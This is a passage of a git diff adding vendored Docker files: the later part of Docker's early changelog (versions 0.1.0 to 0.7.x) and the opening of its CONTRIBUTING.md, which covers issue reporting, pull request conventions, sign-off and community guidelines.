on the daemon +* Disable verbose during tests +* Upgrade to go1.2 for official build +* Improve unit tests +* The test suite now runs all tests even if one fails +* Refactor C in Go (Devmapper) +- Fix OS X compilation + +## 0.7.0 (2013-11-25) + +#### Notable features since 0.6.0 + +* Storage drivers: choose from aufs, device-mapper, or vfs. +* Standard Linux support: docker now runs on unmodified Linux kernels and all major distributions. +* Links: compose complex software stacks by connecting containers to each other. +* Container naming: organize your containers by giving them memorable names. +* Advanced port redirects: specify port redirects per interface, or keep sensitive ports private. +* Offline transfer: push and pull images to the filesystem without losing information. +* Quality: numerous bugfixes and small usability improvements. Significant increase in test coverage. + +## 0.6.7 (2013-11-21) + +#### Runtime + +* Improve stability, fixes some race conditions +* Skip the volumes mounted when deleting the volumes of container. 
+* Fix layer size computation: handle hard links correctly +* Use the work Path for docker cp CONTAINER:PATH +* Fix tmp dir never cleanup +* Speedup docker ps +* More informative error message on name collisions +* Fix nameserver regex +* Always return long id's +* Fix container restart race condition +* Keep published ports on docker stop;docker start +* Fix container networking on Fedora +* Correctly express "any address" to iptables +* Fix network setup when reconnecting to ghost container +* Prevent deletion if image is used by a running container +* Lock around read operations in graph + +#### RemoteAPI + +* Return full ID on docker rmi + +#### Client + ++ Add -tree option to images ++ Offline image transfer +* Exit with status 2 on usage error and display usage on stderr +* Do not forward SIGCHLD to container +* Use string timestamp for docker events -since + +#### Other + +* Update to go 1.2rc5 ++ Add /etc/default/docker support to upstart + +## 0.6.6 (2013-11-06) + +#### Runtime + +* Ensure container name on register +* Fix regression in /etc/hosts ++ Add lock around write operations in graph +* Check if port is valid +* Fix restart runtime error with ghost container networking ++ Add some more colors and animals to increase the pool of generated names +* Fix issues in docker inspect ++ Escape apparmor confinement ++ Set environment variables using a file. 
+* Prevent docker insert to erase something ++ Prevent DNS server conflicts in CreateBridgeIface ++ Validate bind mounts on the server side ++ Use parent image config in docker build +* Fix regression in /etc/hosts + +#### Client + ++ Add -P flag to publish all exposed ports ++ Add -notrunc and -q flags to docker history +* Fix docker commit, tag and import usage ++ Add stars, trusted builds and library flags in docker search +* Fix docker logs with tty + +#### RemoteAPI + +* Make /events API send headers immediately +* Do not split last column docker top ++ Add size to history + +#### Other + ++ Contrib: Desktop integration. Firefox usecase. ++ Dockerfile: bump to go1.2rc3 + +## 0.6.5 (2013-10-29) + +#### Runtime + ++ Containers can now be named ++ Containers can now be linked together for service discovery ++ 'run -a', 'start -a' and 'attach' can forward signals to the container for better integration with process supervisors ++ Automatically start crashed containers after a reboot ++ Expose IP, port, and proto as separate environment vars for container links +* Allow ports to be published to specific ips +* Prohibit inter-container communication by default +- Ignore ErrClosedPipe for stdin in Container.Attach +- Remove unused field kernelVersion +* Fix issue when mounting subdirectories of /mnt in container +- Fix untag during removal of images +* Check return value of syscall.Chdir when changing working directory inside dockerinit + +#### Client + +- Only pass stdin to hijack when needed to avoid closed pipe errors +* Use less reflection in command-line method invocation +- Monitor the tty size after starting the container, not prior +- Remove useless os.Exit() calls after log.Fatal + +#### Hack + ++ Add initial init scripts library and a safer Ubuntu packaging script that works for Debian +* Add -p option to invoke debootstrap with http_proxy +- Update install.sh with $sh_c to get sudo/su for modprobe +* Update all the mkimage scripts to use --numeric-owner as 
a tar argument +* Update hack/release.sh process to automatically invoke hack/make.sh and bail on build and test issues + +#### Other + +* Documentation: Fix the flags for nc in example +* Testing: Remove warnings and prevent mount issues +- Testing: Change logic for tty resize to avoid warning in tests +- Builder: Fix race condition in docker build with verbose output +- Registry: Fix content-type for PushImageJSONIndex method +* Contrib: Improve helper tools to generate debian and Arch linux server images + +## 0.6.4 (2013-10-16) + +#### Runtime + +- Add cleanup of container when Start() fails +* Add better comments to utils/stdcopy.go +* Add utils.Errorf for error logging ++ Add -rm to docker run for removing a container on exit +- Remove error messages which are not actually errors +- Fix `docker rm` with volumes +- Fix some error cases where an HTTP body might not be closed +- Fix panic with wrong dockercfg file +- Fix the attach behavior with -i +* Record termination time in state. 
+- Use empty string so TempDir uses the OS's temp dir automatically +- Make sure to close the network allocators ++ Autorestart containers by default +* Bump vendor kr/pty to commit 3b1f6487b `(syscall.O_NOCTTY)` +* lxc: Allow set_file_cap capability in container +- Move run -rm to the cli only +* Split stdout stderr +* Always create a new session for the container + +#### Testing + +- Add aggregated docker-ci email report +- Add cleanup to remove leftover containers +* Add nightly release to docker-ci +* Add more tests around auth.ResolveAuthConfig +- Remove a few errors in tests +- Catch errClosing error when TCP and UDP proxies are terminated +* Only run certain tests with TESTFLAGS='-run TestName' make.sh +* Prevent docker-ci to test closing PRs +* Replace panic by log.Fatal in tests +- Increase TestRunDetach timeout + +#### Documentation + +* Add initial draft of the Docker infrastructure doc +* Add devenvironment link to CONTRIBUTING.md +* Add `apt-get install curl` to Ubuntu docs +* Add explanation for export restrictions +* Add .dockercfg doc +* Remove Gentoo install notes about #1422 workaround +* Fix help text for -v option +* Fix Ping endpoint documentation +- Fix parameter names in docs for ADD command +- Fix ironic typo in changelog +* Various command fixes in postgres example +* Document how to edit and release docs +- Minor updates to `postgresql_service.rst` +* Clarify LGTM process to contributors +- Corrected error in the package name +* Document what `vagrant up` is actually doing ++ improve doc search results +* Cleanup whitespace in API 1.5 docs +* use angle brackets in MAINTAINER example email +* Update archlinux.rst ++ Changes to a new style for the docs. Includes version switcher. 
+* Formatting, add information about multiline json +* Improve registry and index REST API documentation +- Replace deprecated upgrading reference to docker-latest.tgz, which hasn't been updated since 0.5.3 +* Update Gentoo installation documentation now that we're in the portage tree proper +* Cleanup and reorganize docs and tooling for contributors and maintainers +- Minor spelling correction of protocoll -> protocol + +#### Contrib + +* Add vim syntax highlighting for Dockerfiles from @honza +* Add mkimage-arch.sh +* Reorganize contributed completion scripts to add zsh completion + +#### Hack + +* Add vagrant user to the docker group +* Add proper bash completion for "docker push" +* Add xz utils as a runtime dep +* Add cleanup/refactor portion of #2010 for hack and Dockerfile updates ++ Add contrib/mkimage-centos.sh back (from #1621), and associated documentation link +* Add several of the small make.sh fixes from #1920, and make the output more consistent and contributor-friendly ++ Add @tianon to hack/MAINTAINERS +* Improve network performance for VirtualBox +* Revamp install.sh to be usable by more people, and to use official install methods whenever possible (apt repo, portage tree, etc.) +- Fix contrib/mkimage-debian.sh apt caching prevention ++ Add Dockerfile.tmLanguage to contrib +* Configured FPM to make /etc/init/docker.conf a config file +* Enable SSH Agent forwarding in Vagrant VM +* Several small tweaks/fixes for contrib/mkimage-debian.sh + +#### Other + +- Builder: Abort build if mergeConfig returns an error and fix duplicate error message +- Packaging: Remove deprecated packaging directory +- Registry: Use correct auth config when logging in. 
+- Registry: Fix the error message so it is the same as the regex + +## 0.6.3 (2013-09-23) + +#### Packaging + +* Add 'docker' group on install for ubuntu package +* Update tar vendor dependency +* Download apt key over HTTPS + +#### Runtime + +- Only copy and change permissions on non-bindmount volumes +* Allow multiple volumes-from +- Fix HTTP imports from STDIN + +#### Documentation + +* Update section on extracting the docker binary after build +* Update development environment docs for new build process +* Remove 'base' image from documentation + +#### Other + +- Client: Fix detach issue +- Registry: Update regular expression to match index + +## 0.6.2 (2013-09-17) + +#### Runtime + ++ Add domainname support ++ Implement image filtering with path.Match +* Remove unnecessary warnings +* Remove os/user dependency +* Only mount the hostname file when the config exists +* Handle signals within the `docker login` command +- UID and GID are now also applied to volumes +- `docker start` set error code upon error +- `docker run` set the same error code as the process started + +#### Builder + ++ Add -rm option in order to remove intermediate containers +* Allow multiline for the RUN instruction + +#### Registry + +* Implement login with private registry +- Fix push issues + +#### Other + ++ Hack: Vendor all dependencies +* Remote API: Bump to v1.5 +* Packaging: Break down hack/make.sh into small scripts, one per 'bundle': test, binary, ubuntu etc. 
+* Documentation: General improvements + +## 0.6.1 (2013-08-23) + +#### Registry + +* Pass "meta" headers in API calls to the registry + +#### Packaging + +- Use correct upstart script with new build tool +- Use libffi-dev, don't build it from sources +- Remove duplicate mercurial install command + +## 0.6.0 (2013-08-22) + +#### Runtime + ++ Add lxc-conf flag to allow custom lxc options ++ Add an option to set the working directory +* Add Image name to LogEvent tests ++ Add -privileged flag and relevant tests, docs, and examples +* Add websocket support to /container//attach/ws +* Add warning when net.ipv4.ip_forwarding = 0 +* Add hostname to environment +* Add last stable version in `docker version` +- Fix race conditions in parallel pull +- Fix Graph ByParent() to generate list of child images per parent image. +- Fix typo: fmt.Sprint -> fmt.Sprintf +- Fix small \n error in docker build +* Fix to "Inject dockerinit at /.dockerinit" +* Fix #910. print user name to docker info output +* Use Go 1.1.2 for dockerbuilder +* Use ranged for loop on channels +- Use utils.ParseRepositoryTag instead of strings.Split(name, ":") in server.ImageDelete +- Improve CMD, ENTRYPOINT, and attach docs. +- Improve connect message with socket error +- Load authConfig only when needed and fix useless WARNING +- Show tag used when image is missing +* Apply volumes-from before creating volumes +- Make docker run handle SIGINT/SIGTERM +- Prevent crash when .dockercfg not readable +- Install script should be fetched over https, not http. +* API, issue 1471: Use groups for socket permissions +- Correctly detect IPv4 forwarding +* Mount /dev/shm as a tmpfs +- Switch from http to https for get.docker.io +* Let userland proxy handle container-bound traffic +* Update the Docker CLI to specify a value for the "Host" header. 
+- Change network range to avoid conflict with EC2 DNS +- Reduce connect and read timeout when pinging the registry +* Parallel pull +- Handle ip route showing mask-less IP addresses +* Allow ENTRYPOINT without CMD +- Always consider localhost as a domain name when parsing the FQN repos name +* Refactor checksum + +#### Documentation + +* Add MongoDB image example +* Add instructions for creating and using the docker group +* Add sudo to examples and installation to documentation +* Add ufw doc +* Add a reference to ps -a +* Add information about Docker's high level tools over LXC. +* Fix typo in docs for docker run -dns +* Fix a typo in the ubuntu installation guide +* Fix to docs regarding adding docker groups +* Update default -H docs +* Update readme with dependencies for building +* Update amazon.rst to explain that Vagrant is not necessary for running Docker on ec2 +* PostgreSQL service example in documentation +* Suggest installing linux-headers by default. +* Change the twitter handle +* Clarify Amazon EC2 installation +* 'Base' image is deprecated and should no longer be referenced in the docs. +* Move note about officially supported kernel +- Solved the logo being squished in Safari + +#### Builder + ++ Add USER instruction to Dockerfile ++ Add workdir support for the Buildfile +* Add no cache for docker build +- Fix docker build and docker events output +- Only count known instructions as build steps +- Make sure ENV instruction within build perform a commit each time +- Forbid certain paths within docker build ADD +- Repository name (and optionally a tag) in build usage +- Make sure ADD will create everything in 0755 + +#### Remote API + +* Sort Images by most recent creation date. 
+* Reworking opaque requests in registry module +* Add image name in /events +* Use mime pkg to parse Content-Type +* 650 http utils and user agent field + +#### Hack + ++ Bash Completion: Limit commands to containers of a relevant state +* Add docker dependencies coverage testing into docker-ci + +#### Packaging + ++ Docker-brew 0.5.2 support and memory footprint reduction +* Add new docker dependencies into docker-ci +- Revert "docker.upstart: avoid spawning a `sh` process" ++ Docker-brew and Docker standard library ++ Release docker with docker +* Fix the upstart script generated by get.docker.io +* Enabled the docs to generate manpages. +* Revert Bind daemon to 0.0.0.0 in Vagrant. + +#### Register + +* Improve auth push +* Registry unit tests + mock registry + +#### Tests + +* Improve TestKillDifferentUser to prevent timeout on buildbot +- Fix typo in TestBindMounts (runContainer called without image) +* Improve TestGetContainersTop so it does not rely on sleep +* Relax the lo interface test to allow iface index != 1 +* Add registry functional test to docker-ci +* Add some tests in server and utils + +#### Other + +* Contrib: bash completion script +* Client: Add docker cp command and copy api endpoint to copy container files/folders to the host +* Don`t read from stdout when only attached to stdin + +## 0.5.3 (2013-08-13) + +#### Runtime + +* Use docker group for socket permissions +- Spawn shell within upstart script +- Handle ip route showing mask-less IP addresses +- Add hostname to environment + +#### Builder + +- Make sure ENV instruction within build perform a commit each time + +## 0.5.2 (2013-08-08) + +* Builder: Forbid certain paths within docker build ADD +- Runtime: Change network range to avoid conflict with EC2 DNS +* API: Change daemon to listen on unix socket by default + +## 0.5.1 (2013-07-30) + +#### Runtime + ++ Add `ps` args to `docker top` ++ Add support for container ID files (pidfile like) ++ Add container=lxc in default env ++ Support 
networkless containers with `docker run -n` and `docker -d -b=none` +* Stdout/stderr logs are now stored in the same file as JSON +* Allocate a /16 IP range by default, with fallback to /24. Try 12 ranges instead of 3. +* Change .dockercfg format to json and support multiple auth remote +- Do not override volumes from config +- Fix issue with EXPOSE override + +#### API + ++ Docker client now sets useragent (RFC 2616) ++ Add /events endpoint + +#### Builder + ++ ADD command now understands URLs ++ CmdAdd and CmdEnv now respect Dockerfile-set ENV variables +- Create directories with 755 instead of 700 within ADD instruction + +#### Hack + +* Simplify unit tests with helpers +* Improve docker.upstart event +* Add coverage testing into docker-ci + +## 0.5.0 (2013-07-17) + +#### Runtime + ++ List all processes running inside a container with 'docker top' ++ Host directories can be mounted as volumes with 'docker run -v' ++ Containers can expose public UDP ports (eg, '-p 123/udp') ++ Optionally specify an exact public port (eg. '-p 80:4500') +* 'docker login' supports additional options +- Don't save a container`s hostname when committing an image. + +#### Registry + ++ New image naming scheme inspired by Go packaging convention allows arbitrary combinations of registries +- Fix issues when uploading images to a private registry + +#### Builder + ++ ENTRYPOINT instruction sets a default binary entry point to a container ++ VOLUME instruction marks a part of the container as persistent data +* 'docker build' displays the full output of a build by default + +## 0.4.8 (2013-07-01) + ++ Builder: New build operation ENTRYPOINT adds an executable entry point to the container. - Runtime: Fix a bug which caused 'docker run -d' to no longer print the container ID. 
+- Tests: Fix issues in the test suite + +## 0.4.7 (2013-06-28) + +#### Remote API + +* The progress bar updates faster when downloading and uploading large files +- Fix a bug in the optional unix socket transport + +#### Runtime + +* Improve detection of kernel version ++ Host directories can be mounted as volumes with 'docker run -b' +- fix an issue when only attaching to stdin +* Use 'tar --numeric-owner' to avoid uid mismatch across multiple hosts + +#### Hack + +* Improve test suite and dev environment +* Remove dependency on unit tests on 'os/user' + +#### Other + +* Registry: easier push/pull to a custom registry ++ Documentation: add terminology section + +## 0.4.6 (2013-06-22) + +- Runtime: fix a bug which caused creation of empty images (and volumes) to crash. + +## 0.4.5 (2013-06-21) + ++ Builder: 'docker build git://URL' fetches and builds a remote git repository +* Runtime: 'docker ps -s' optionally prints container size +* Tests: improved and simplified +- Runtime: fix a regression introduced in 0.4.3 which caused the logs command to fail. +- Builder: fix a regression when using ADD with single regular file. + +## 0.4.4 (2013-06-19) + +- Builder: fix a regression introduced in 0.4.3 which caused builds to fail on new clients. + +## 0.4.3 (2013-06-19) + +#### Builder + ++ ADD of a local file will detect tar archives and unpack them +* ADD improvements: use tar for copy + automatically unpack local archives +* ADD uses tar/untar for copies instead of calling 'cp -ar' +* Fix the behavior of ADD to be (mostly) reverse-compatible, predictable and well-documented. +- Fix a bug which caused builds to fail if ADD was the first command +* Nicer output for 'docker build' + +#### Runtime + +* Remove bsdtar dependency +* Add unix socket and multiple -H support +* Prevent rm of running containers +* Use go1.1 cookiejar +- Fix issue detaching from running TTY container +- Forbid parallel push/pull for a single image/repo. 
Fixes #311 +- Fix race condition within Run command when attaching. + +#### Client + +* HumanReadable ProgressBar sizes in pull +* Fix docker version`s git commit output + +#### API + +* Send all tags on History API call +* Add tag lookup to history command. Fixes #882 + +#### Documentation + +- Fix missing command in irc bouncer example + +## 0.4.2 (2013-06-17) + +- Packaging: Bumped version to work around an Ubuntu bug + +## 0.4.1 (2013-06-17) + +#### Remote Api + ++ Add flag to enable cross domain requests ++ Add images and containers sizes in docker ps and docker images + +#### Runtime + ++ Configure dns configuration host-wide with 'docker -d -dns' ++ Detect faulty DNS configuration and replace it with a public default ++ Allow docker run : ++ You can now specify public port (ex: -p 80:4500) +* Improve image removal to garbage-collect unreferenced parents + +#### Client + +* Allow multiple params in inspect +* Print the container id before the hijack in `docker run` + +#### Registry + +* Add regexp check on repo`s name +* Move auth to the client +- Remove login check on pull + +#### Other + +* Vagrantfile: Add the rest api port to vagrantfile`s port_forward +* Upgrade to Go 1.1 +- Builder: don`t ignore last line in Dockerfile when it doesn`t end with \n + +## 0.4.0 (2013-06-03) + +#### Builder + ++ Introducing Builder ++ 'docker build' builds a container, layer by layer, from a source repository containing a Dockerfile + +#### Remote API + ++ Introducing Remote API ++ control Docker programmatically using a simple HTTP/json API + +#### Runtime + +* Various reliability and usability improvements + +## 0.3.4 (2013-05-30) + +#### Builder + ++ 'docker build' builds a container, layer by layer, from a source repository containing a Dockerfile ++ 'docker build -t FOO' applies the tag FOO to the newly built container. 
+ +#### Runtime + ++ Interactive TTYs correctly handle window resize +* Fix how configuration is merged between layers + +#### Remote API + ++ Split stdout and stderr on 'docker run' ++ Optionally listen on a different IP and port (use at your own risk) + +#### Documentation + +* Improve install instructions. + +## 0.3.3 (2013-05-23) + +- Registry: Fix push regression +- Various bugfixes + +## 0.3.2 (2013-05-09) + +#### Registry + +* Improve the checksum process +* Use the size to have a good progress bar while pushing +* Use the actual archive if it exists in order to speed up the push +- Fix error 400 on push + +#### Runtime + +* Store the actual archive on commit + +## 0.3.1 (2013-05-08) + +#### Builder + ++ Implement the autorun capability within docker builder ++ Add caching to docker builder ++ Add support for docker builder with native API as top level command ++ Implement ENV within docker builder +- Check the command existence prior create and add Unit tests for the case +* use any whitespaces instead of tabs + +#### Runtime + ++ Add go version to debug infos +* Kernel version - don`t show the dash if flavor is empty + +#### Registry + ++ Add docker search top level command in order to search a repository +- Fix pull for official images with specific tag +- Fix issue when login in with a different user and trying to push +* Improve checksum - async calculation + +#### Images + ++ Output graph of images to dot (graphviz) +- Fix ByParent function + +#### Documentation + ++ New introduction and high-level overview ++ Add the documentation for docker builder +- CSS fix for docker documentation to make REST API docs look better. +- Fix CouchDB example page header mistake +- Fix README formatting +* Update www.docker.io website. 
+ +#### Other + ++ Website: new high-level overview +- Makefile: Swap "go get" for "go get -d", especially to compile on go1.1rc +* Packaging: packaging ubuntu; issue #510: Use goland-stable PPA package to build docker + +## 0.3.0 (2013-05-06) + +#### Runtime + +- Fix the command existence check +- strings.Split may return an empty string on no match +- Fix an index out of range crash if cgroup memory is not + +#### Documentation + +* Various improvements ++ New example: sharing data between 2 couchdb databases + +#### Other + +* Vagrant: Use only one deb line in /etc/apt ++ Registry: Implement the new registry + +## 0.2.2 (2013-05-03) + ++ Support for data volumes ('docker run -v=PATH') ++ Share data volumes between containers ('docker run -volumes-from') ++ Improve documentation +* Upgrade to Go 1.0.3 +* Various upgrades to the dev environment for contributors + +## 0.2.1 (2013-05-01) + ++ 'docker commit -run' bundles a layer with default runtime options: command, ports etc. +* Improve install process on Vagrant ++ New Dockerfile operation: "maintainer" ++ New Dockerfile operation: "expose" ++ New Dockerfile operation: "cmd" ++ Contrib script to build a Debian base layer ++ 'docker -d -r': restart crashed containers at daemon startup +* Runtime: improve test coverage + +## 0.2.0 (2013-04-23) + +- Runtime: ghost containers can be killed and waited for +* Documentation: update install instructions +- Packaging: fix Vagrantfile +- Development: automate releasing binaries and ubuntu packages ++ Add a changelog +- Various bugfixes + +## 0.1.8 (2013-04-22) + +- Dynamically detect cgroup capabilities +- Issue stability warning on kernels <3.8 +- 'docker push' buffers on disk instead of memory +- Fix 'docker diff' for removed files +- Fix 'docker stop' for ghost containers +- Fix handling of pidfile +- Various bugfixes and stability improvements + +## 0.1.7 (2013-04-18) + +- Container ports are available on localhost +- 'docker ps' shows allocated TCP ports +- 
Contributors can run 'make hack' to start a continuous integration VM +- Streamline ubuntu packaging & uploading +- Various bugfixes and stability improvements + +## 0.1.6 (2013-04-17) + +- Record the author an image with 'docker commit -author' + +## 0.1.5 (2013-04-17) + +- Disable standalone mode +- Use a custom DNS resolver with 'docker -d -dns' +- Detect ghost containers +- Improve diagnosis of missing system capabilities +- Allow disabling memory limits at compile time +- Add debian packaging +- Documentation: installing on Arch Linux +- Documentation: running Redis on docker +- Fix lxc 0.9 compatibility +- Automatically load aufs module +- Various bugfixes and stability improvements + +## 0.1.4 (2013-04-09) + +- Full support for TTY emulation +- Detach from a TTY session with the escape sequence `C-p C-q` +- Various bugfixes and stability improvements +- Minor UI improvements +- Automatically create our own bridge interface 'docker0' + +## 0.1.3 (2013-04-04) + +- Choose TCP frontend port with '-p :PORT' +- Layer format is versioned +- Major reliability improvements to the process manager +- Various bugfixes and stability improvements + +## 0.1.2 (2013-04-03) + +- Set container hostname with 'docker run -h' +- Selective attach at run with 'docker run -a [stdin[,stdout[,stderr]]]' +- Various bugfixes and stability improvements +- UI polish +- Progress bar on push/pull +- Use XZ compression by default +- Make IP allocator lazy + +## 0.1.1 (2013-03-31) + +- Display shorthand IDs for convenience +- Stabilize process management +- Layers can include a commit message +- Simplified 'docker attach' +- Fix support for re-attaching +- Various bugfixes and stability improvements +- Auto-download at run +- Auto-login on push +- Beefed up documentation + +## 0.1.0 (2013-03-23) + +Initial public release + +- Implement registry in order to push/pull images +- TCP port allocation +- Fix termcaps on Linux +- Add documentation +- Add Vagrant support with Vagrantfile +- Add unit 
tests +- Add repository/tags to ease image management +- Improve the layer implementation diff --git a/vendor/github.com/docker/docker/CONTRIBUTING.md b/vendor/github.com/docker/docker/CONTRIBUTING.md new file mode 100644 index 0000000000..eb5f8ab0e9 --- /dev/null +++ b/vendor/github.com/docker/docker/CONTRIBUTING.md @@ -0,0 +1,401 @@ +# Contributing to Docker + +Want to hack on Docker? Awesome! We have a contributor's guide that explains +[setting up a Docker development environment and the contribution +process](https://docs.docker.com/opensource/project/who-written-for/). + +[![Contributors guide](docs/static_files/contributors.png)](https://docs.docker.com/opensource/project/who-written-for/) + +This page contains information about reporting issues as well as some tips and +guidelines useful to experienced open source contributors. Finally, make sure +you read our [community guidelines](#docker-community-guidelines) before you +start participating. + +## Topics + +* [Reporting Security Issues](#reporting-security-issues) +* [Design and Cleanup Proposals](#design-and-cleanup-proposals) +* [Reporting Issues](#reporting-other-issues) +* [Quick Contribution Tips and Guidelines](#quick-contribution-tips-and-guidelines) +* [Community Guidelines](#docker-community-guidelines) + +## Reporting security issues + +The Docker maintainers take security seriously. If you discover a security +issue, please bring it to their attention right away! + +Please **DO NOT** file a public issue, instead send your report privately to +[security@docker.com](mailto:security@docker.com). + +Security reports are greatly appreciated and we will publicly thank you for it. +We also like to send gifts—if you're into Docker schwag, make sure to let +us know. We currently do not offer a paid security bounty program, but are not +ruling it out in the future. + + +## Reporting other issues + +A great way to contribute to the project is to send a detailed report when you +encounter an issue. 
We always appreciate a well-written, thorough bug report, +and will thank you for it! + +Check that [our issue database](https://github.com/docker/docker/issues) +doesn't already include that problem or suggestion before submitting an issue. +If you find a match, you can use the "subscribe" button to get notified on +updates. Do *not* leave random "+1" or "I have this too" comments, as they +only clutter the discussion, and don't help resolving it. However, if you +have ways to reproduce the issue or have additional information that may help +resolving the issue, please leave a comment. + +When reporting issues, always include: + +* The output of `docker version`. +* The output of `docker info`. + +Also include the steps required to reproduce the problem if possible and +applicable. This information will help us review and fix your issue faster. +When sending lengthy log-files, consider posting them as a gist (https://gist.github.com). +Don't forget to remove sensitive data from your logfiles before posting (you can +replace those parts with "REDACTED"). + +## Quick contribution tips and guidelines + +This section gives the experienced contributor some tips and guidelines. + +### Pull requests are always welcome + +Not sure if that typo is worth a pull request? Found a bug and know how to fix +it? Do it! We will appreciate it. Any significant improvement should be +documented as [a GitHub issue](https://github.com/docker/docker/issues) before +anybody starts working on it. + +We are always thrilled to receive pull requests. We do our best to process them +quickly. If your pull request is not accepted on the first try, +don't get discouraged! Our contributor's guide explains [the review process we +use for simple changes](https://docs.docker.com/opensource/workflow/make-a-contribution/). + +### Design and cleanup proposals + +You can propose new designs for existing Docker features. You can also design +entirely new features. 
We really appreciate contributors who want to refactor or +otherwise cleanup our project. For information on making these types of +contributions, see [the advanced contribution +section](https://docs.docker.com/opensource/workflow/advanced-contributing/) in +the contributors guide. + +We try hard to keep Docker lean and focused. Docker can't do everything for +everybody. This means that we might decide against incorporating a new feature. +However, there might be a way to implement that feature *on top of* Docker. + +### Talking to other Docker users and contributors + + + + + + + + + + + + + + + + + + + + + + + + +
Forums + A public forum for users to discuss questions and explore current design patterns and + best practices about Docker and related projects in the Docker Ecosystem. To participate, + just log in with your Docker Hub account on https://forums.docker.com. +
Internet Relay Chat (IRC) +

+ IRC a direct line to our most knowledgeable Docker users; we have + both the #docker and #docker-dev group on + irc.freenode.net. + IRC is a rich chat protocol but it can overwhelm new users. You can search + our chat archives. +

+

+ Read our IRC quickstart guide + for an easy way to get started. +

+
Google Group + The docker-dev + group is for contributors and other people contributing to the Docker project. + You can join them without a google account by sending an email to + docker-dev+subscribe@googlegroups.com. + After receiving the join-request message, you can simply reply to that to confirm the subscription. +
Twitter + You can follow Docker's Twitter feed + to get updates on our products. You can also tweet us questions or just + share blogs or stories. +
Stack Overflow + Stack Overflow has over 17000 Docker questions listed. We regularly + monitor Docker questions + and so do many other knowledgeable Docker users. +
+ + +### Conventions + +Fork the repository and make changes on your fork in a feature branch: + +- If it's a bug fix branch, name it XXXX-something where XXXX is the number of + the issue. +- If it's a feature branch, create an enhancement issue to announce + your intentions, and name it XXXX-something where XXXX is the number of the + issue. + +Submit unit tests for your changes. Go has a great test framework built in; use +it! Take a look at existing tests for inspiration. [Run the full test +suite](https://docs.docker.com/opensource/project/test-and-docs/) on your branch before +submitting a pull request. + +Update the documentation when creating or modifying features. Test your +documentation changes for clarity, concision, and correctness, as well as a +clean documentation build. See our contributors guide for [our style +guide](https://docs.docker.com/opensource/doc-style) and instructions on [building +the documentation](https://docs.docker.com/opensource/project/test-and-docs/#build-and-test-the-documentation). + +Write clean code. Universally formatted code promotes ease of writing, reading, +and maintenance. Always run `gofmt -s -w file.go` on each changed file before +committing your changes. Most editors have plug-ins that do this automatically. + +Pull request descriptions should be as clear as possible and include a reference +to all the issues that they address. + +Commit messages must start with a capitalized and short summary (max. 50 chars) +written in the imperative, followed by an optional, more detailed explanatory +text which is separated from the summary by an empty line. + +Code review comments may be added to your pull request. Discuss, then make the +suggested modifications and push additional commits to your feature branch. Post +a comment after pushing. New commits show up in the pull request automatically, +but the reviewers are notified only when you comment. 
+ +Pull requests must be cleanly rebased on top of master without multiple branches +mixed into the PR. + +**Git tip**: If your PR no longer merges cleanly, use `rebase master` in your +feature branch to update your pull request rather than `merge master`. + +Before you make a pull request, squash your commits into logical units of work +using `git rebase -i` and `git push -f`. A logical unit of work is a consistent +set of patches that should be reviewed together: for example, upgrading the +version of a vendored dependency and taking advantage of its now available new +feature constitute two separate units of work. Implementing a new function and +calling it in another file constitute a single logical unit of work. The very +high majority of submissions should have a single commit, so if in doubt: squash +down to one. + +After every commit, [make sure the test suite passes] +(https://docs.docker.com/opensource/project/test-and-docs/). Include documentation +changes in the same pull request so that a revert would remove all traces of +the feature or fix. + +Include an issue reference like `Closes #XXXX` or `Fixes #XXXX` in commits that +close an issue. Including references automatically closes the issue on a merge. + +Please do not add yourself to the `AUTHORS` file, as it is regenerated regularly +from the Git history. + +Please see the [Coding Style](#coding-style) for further guidelines. + +### Merge approval + +Docker maintainers use LGTM (Looks Good To Me) in comments on the code review to +indicate acceptance. + +A change requires LGTMs from an absolute majority of the maintainers of each +component affected. For example, if a change affects `docs/` and `registry/`, it +needs an absolute majority from the maintainers of `docs/` AND, separately, an +absolute majority of the maintainers of `registry/`. + +For more details, see the [MAINTAINERS](MAINTAINERS) page. 
+ +### Sign your work + +The sign-off is a simple line at the end of the explanation for the patch. Your +signature certifies that you wrote the patch or otherwise have the right to pass +it on as an open-source patch. The rules are pretty simple: if you can certify +the below (from [developercertificate.org](http://developercertificate.org/)): + +``` +Developer Certificate of Origin +Version 1.1 + +Copyright (C) 2004, 2006 The Linux Foundation and its contributors. +1 Letterman Drive +Suite D4700 +San Francisco, CA, 94129 + +Everyone is permitted to copy and distribute verbatim copies of this +license document, but changing it is not allowed. + +Developer's Certificate of Origin 1.1 + +By making a contribution to this project, I certify that: + +(a) The contribution was created in whole or in part by me and I + have the right to submit it under the open source license + indicated in the file; or + +(b) The contribution is based upon previous work that, to the best + of my knowledge, is covered under an appropriate open source + license and I have the right under that license to submit that + work with modifications, whether created in whole or in part + by me, under the same open source license (unless I am + permitted to submit under a different license), as indicated + in the file; or + +(c) The contribution was provided directly to me by some other + person who certified (a), (b) or (c) and I have not modified + it. + +(d) I understand and agree that this project and the contribution + are public and that a record of the contribution (including all + personal information I submit with it, including my sign-off) is + maintained indefinitely and may be redistributed consistent with + this project or the open source license(s) involved. +``` + +Then you just add a line to every git commit message: + + Signed-off-by: Joe Smith + +Use your real name (sorry, no pseudonyms or anonymous contributions.) 
+ +If you set your `user.name` and `user.email` git configs, you can sign your +commit automatically with `git commit -s`. + +### How can I become a maintainer? + +The procedures for adding new maintainers are explained in the +global [MAINTAINERS](https://github.com/docker/opensource/blob/master/MAINTAINERS) +file in the [https://github.com/docker/opensource/](https://github.com/docker/opensource/) +repository. + +Don't forget: being a maintainer is a time investment. Make sure you +will have time to make yourself available. You don't have to be a +maintainer to make a difference on the project! + +## Docker community guidelines + +We want to keep the Docker community awesome, growing and collaborative. We need +your help to keep it that way. To help with this we've come up with some general +guidelines for the community as a whole: + +* Be nice: Be courteous, respectful and polite to fellow community members: + no regional, racial, gender, or other abuse will be tolerated. We like + nice people way better than mean ones! + +* Encourage diversity and participation: Make everyone in our community feel + welcome, regardless of their background and the extent of their + contributions, and do everything possible to encourage participation in + our community. + +* Keep it legal: Basically, don't get us in trouble. Share only content that + you own, do not share private or sensitive information, and don't break + the law. + +* Stay on topic: Make sure that you are posting to the correct channel and + avoid off-topic discussions. Remember when you update an issue or respond + to an email you are potentially sending to a large number of people. Please + consider this before you update. Also remember that nobody likes spam. + +* Don't send email to the maintainers: There's no need to send email to the + maintainers to ask them to investigate an issue or to take a look at a + pull request. 
